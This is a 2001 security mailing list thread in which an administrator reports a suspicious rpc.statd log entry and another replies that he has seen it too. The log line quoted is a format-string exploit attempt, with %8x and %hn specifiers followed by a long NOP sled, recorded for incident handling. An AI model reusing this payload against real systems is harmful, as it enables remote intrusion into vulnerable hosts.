Security Incidents mailing list archives
Re: rpc.statd buffer overflow attempt?
From: Johannes Verelst <johannes () verelst net>
Date: Mon, 29 Oct 2001 17:59:03 +0100 (MET)
On Mon, 29 Oct 2001, John Brahy wrote:
I noticed this in the logs over the weekend. It seems to happen in threes. Looks like a buffer overflow attempt for gethostbyname on rpc.statd. Anyone seen this one before? Oct 26 18:07:45 ccs rpc.statd[189]: gethostbyname error for ^X÷ÿ¿^X÷ÿ¿^Z÷ÿ¿^Z÷ÿ¿%8x%8x%8x%8x%8x%8x%8x%8x%8x%62716x%hn%51859x%hn\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220
yes, I've seen this: (host that does logrotate to .gz files) warserver:/var/log# cat *.gz | gunzip | grep "\\\\220" | wc -l 7 You might find some more information on this here: http://www.google.com/search?hl=nl&q=rpc.statd+220 Google is your best friend. Regards, Johannes Verelst -- Unix is simple. It just takes a genius to understand its simplicity Make it idiot proof, and someone will make a better idiot. ---------------------------------------------------------------------------- This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com
Current thread:
- rpc.statd buffer overflow attempt? John Brahy (Oct 29)
- Re: rpc.statd buffer overflow attempt? Johannes Verelst (Oct 29)